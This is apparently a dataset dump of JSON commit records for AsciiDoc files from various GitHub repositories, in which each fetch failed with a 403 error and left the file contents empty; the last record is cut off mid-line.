{"commit":"4cb7bce311b0d03cf97a48a98a9a1af168a4100d","subject":"y2b create post Nexus 6P vs Nexus 5X","message":"y2b create post Nexus 6P vs Nexus 5X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-29-Nexus-6P-vs-Nexus-5X.adoc","new_file":"_posts\/2015-10-29-Nexus-6P-vs-Nexus-5X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c53309a68a6aed33b613a3417f8947ffbc2f0434","subject":"Update 2016-04-05-Local-File-Inclusion.adoc","message":"Update 2016-04-05-Local-File-Inclusion.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_file":"_posts\/2016-04-05-Local-File-Inclusion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"791fdb8b5d1e1a85fbe88cb37c43764f8659a547","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e118de97284df07f57a5f32babf04f3d5b116716","subject":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","message":"Update 2018-07-19-P-H-P-Under-the-Hood.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_file":"_posts\/2018-07-19-P-H-P-Under-the-Hood.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47e758c5e0da1551a5ebf50eab9ba18bfa366ab","subject":"TCOMP-992 how to contribute to documentation","message":"TCOMP-992 how to contribute to documentation","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/readme.adoc","new_file":"documentation\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chmyga\/component-runtime.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fde6fd59653f292aaed91d8294cfe88158c80f7f","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25341b3cd1fce4cd642d3aa64eebf27407177f67","subject":"add missing doc","message":"add missing doc\n","repos":"puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,nfouka\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,Gavin-Yang\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/intro\/changes-13m2.adoc","new_file":"docs\/src\/reference\/asciidoc\/intro\/changes-13m2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pranavraman\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a89bfe84baadb691664e4cbcc5378b674a01b46e","subject":"[DOCS] Split long lines in Docker TLS getting-started snippet","message":"[DOCS] Split long lines in Docker TLS getting-started snippet\n\nand add warning for Windows users not using\r\nPowerShell (e.g. `cmd.exe`) to remove the `\\` character and join\r\nlines.\r\n\r\nAlso fix trailing whitespace character in link back to `docker.asciidoc`.\r\n\r\nRelates elastic\/x-pack-elasticsearch#2999\n\nOriginal commit: elastic\/x-pack-elasticsearch@fe1c5dbc11f6bf8e8f920a452ae5e02dd859a8fa\n","repos":"scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_file":"docs\/en\/security\/securing-communications\/configuring-tls-docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17cb77d2b8316ffd6f18bc33a44c4b4e1247b126","subject":"ajout de l'article sur Gradle et Kotlin","message":"ajout de l'article sur Gradle et Kotlin\n","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-07-13-gradle-embrasse-kotlin.adoc","new_file":"_posts\/2016-07-13-gradle-embrasse-kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"292f8fdf15aebfdc179f825f40bd273aad0db0a0","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d009f80241607b616ee6e3ce8ebf5d231ceea340","subject":"add the development continuum doc","message":"add the development continuum doc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/continuum.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/continuum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c26a174aca851cce98eaaa397e4b0732022fa65c","subject":"Update 2016-09-15-Sample-Blog-Hello-world.adoc","message":"Update 2016-09-15-Sample-Blog-Hello-world.adoc","repos":"gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io","old_file":"_posts\/2016-09-15-Sample-Blog-Hello-world.adoc","new_file":"_posts\/2016-09-15-Sample-Blog-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdfuentes\/gdfuentes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60d5df3279485baa80c013ff6fee8f14cfa59f0a","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84bb6e38cfde67b9d3ac09bfb730485fc9b0677f","subject":"Update 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Update 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"_posts\/17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"235e0814621203d528305b7d4b5e70f6ea2f9086","subject":"Update 2015-07-27-A-title.adoc","message":"Update 2015-07-27-A-title.adoc","repos":"juliardi\/juliardi.github.io,juliardi\/juliardi.github.io,juliardi\/juliardi.github.io","old_file":"_posts\/2015-07-27-A-title.adoc","new_file":"_posts\/2015-07-27-A-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliardi\/juliardi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c488798e9bde0d7d47cacc1fd789f3da0a8384e5","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2251fa20ac93f1e6c94cb060ea640f0e89db7af7","subject":"Kill Bill events - Initial commit","message":"Kill Bill events - Initial commit","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/kill_bill_events.adoc","new_file":"userguide\/tutorials\/kill_bill_events.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44d7eb60baca34abfcf0659c8f538bf0af630f22","subject":"Start a release-process document (#82)","message":"Start a release-process document (#82)\n\n","repos":"asciidoctor\/asciidoclet,johncarl81\/asciidoclet,johncarl81\/asciidoclet","old_file":"src\/docs\/asciidoc\/release-process.adoc","new_file":"src\/docs\/asciidoc\/release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johncarl81\/asciidoclet.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"024d6d827b87686d2f60b1f60d5bdb706f5862ad","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36677c40c1419436140f9d113e35c81f4b423b85","subject":"Document new defaults and changed variable names","message":"Document new defaults and changed variable names\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0136a930ec054df8188c5effae63ed13988cc87","subject":"JSON in short","message":"JSON in short\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JSON.adoc","new_file":"JSON.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7405595f1f380c5719cb7958345d0cdb093650ca","subject":"Document note filter","message":"Document note filter\n","repos":"rumpelsepp\/pynote","old_file":"man\/note.1.adoc","new_file":"man\/note.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6f5bc4c1a71bce77db957dc2f618859d97b64f","subject":"Created javadoc override","message":"Created javadoc override\n\nSigned-off-by: francesco <56fdeb8ec48293e404ca3681b2b8738f930aab75@gmail.com>\n","repos":"aesteve\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,aesteve\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,aesteve\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,aesteve\/vertx-web,aesteve\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,InfoSec812\/vertx-web","old_file":"vertx-web-api-contract\/src\/main\/asciidoc\/override\/rxjava2.adoc","new_file":"vertx-web-api-contract\/src\/main\/asciidoc\/override\/rxjava2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b57bf62e0fd730cd06cea301f001556519589ad","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3735fdfac3a1f7947e1a404dcdd740db796a429f","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2ea0c801e745f97a32f1453fcbb5edeb3c7e3d","subject":"Changes to documentation","message":"Changes to documentation\n","repos":"ForensicArtifacts\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5c4d6145273c2ffc89029fa9aefafce49a06230","subject":"doc: Use other asciidoc construct for code block","message":"doc: Use other asciidoc construct for code block\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b0f32bdb19e4ede501bd16054935d46d154c48a","subject":"y2b create post OCZ Vertex 3 SSD Unboxing \\u0026 Overview","message":"y2b create post OCZ Vertex 3 SSD Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-21-OCZ-Vertex-3-SSD-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-21-OCZ-Vertex-3-SSD-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7732a557e82d9674299667086058059dc1afbe03","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e6cdeb63a3f74ae949c9a2c74ce1bef3697ae62","subject":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-20-OnePlus5TLimitedEditionUnboxingEasterEgg.adoc","new_file":"_posts\/2017-12-20-OnePlus5TLimitedEditionUnboxingEasterEgg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"492f5396e4e25f03fb9abee3f6e5e7a575221bf2","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6faec0ce65ecca7b16f10800d49ae51199096f2","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72d146e8457f73a4072c233927cf7b5140e7eba","subject":"Create README.adoc","message":"Create README.adoc","repos":"rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python","old_file":"ledgerdump\/README.adoc","new_file":"ledgerdump\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rockwolf\/python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8b19aec7f5bf4ee41e7b356bbce720fe12d8073c","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d436ab4eae8b33cc3b53eed2653615e690971f","subject":"Update 2016-07-30-Web-Multimessengers.adoc","message":"Update 2016-07-30-Web-Multimessengers.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-30-Web-Multimessengers.adoc","new_file":"_posts\/2016-07-30-Web-Multimessengers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"148019bd83498161505cfa2d383df6e225c75659","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d2ab18b5499338b7bd00c592e04548cdfaf017","subject":"Update 2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","message":"Update 2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","new_file":"_posts\/2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b75004cd6270f42b4abd6791000616303a761ec","subject":"y2b create post The $26 Upgrade That Could Save Your Laptop...","message":"y2b create post The $26 Upgrade That Could Save Your Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-09-The-26-Upgrade-That-Could-Save-Your-Laptop.adoc","new_file":"_posts\/2017-09-09-The-26-Upgrade-That-Could-Save-Your-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0493fb13a63cc2912b089138e7f9e1437ad5f642","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aad8384fe6d6666d58077337c86779d5a67f2b88","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bd3c9ebcfb4c9a46e0a5c6887ede35287d9b15","subject":"First draft of Cypher 9","message":"First draft of Cypher 9\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/cypher-9.adoc","new_file":"docs\/cypher-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"035e07eb1cdf79efa805e6067680bb5bb79cb698","subject":"Update 2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","message":"Update 2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","new_file":"_posts\/2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61c404be21115d4315eb479f05fd67152a0d8317","subject":"Added install details for liberty core","message":"Added install details for liberty core\n","repos":"waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca1235a1b071f179f7f18eb888f597e13a56f12b","subject":"Update README demo name","message":"Update README demo name\n","repos":"clara-labs\/react-popover,littlebits\/react-popover,gregory90\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"743acce38476eb98c1d8774ec5346fadbe3856e6","subject":"Added TravisCI badge","message":"Added TravisCI 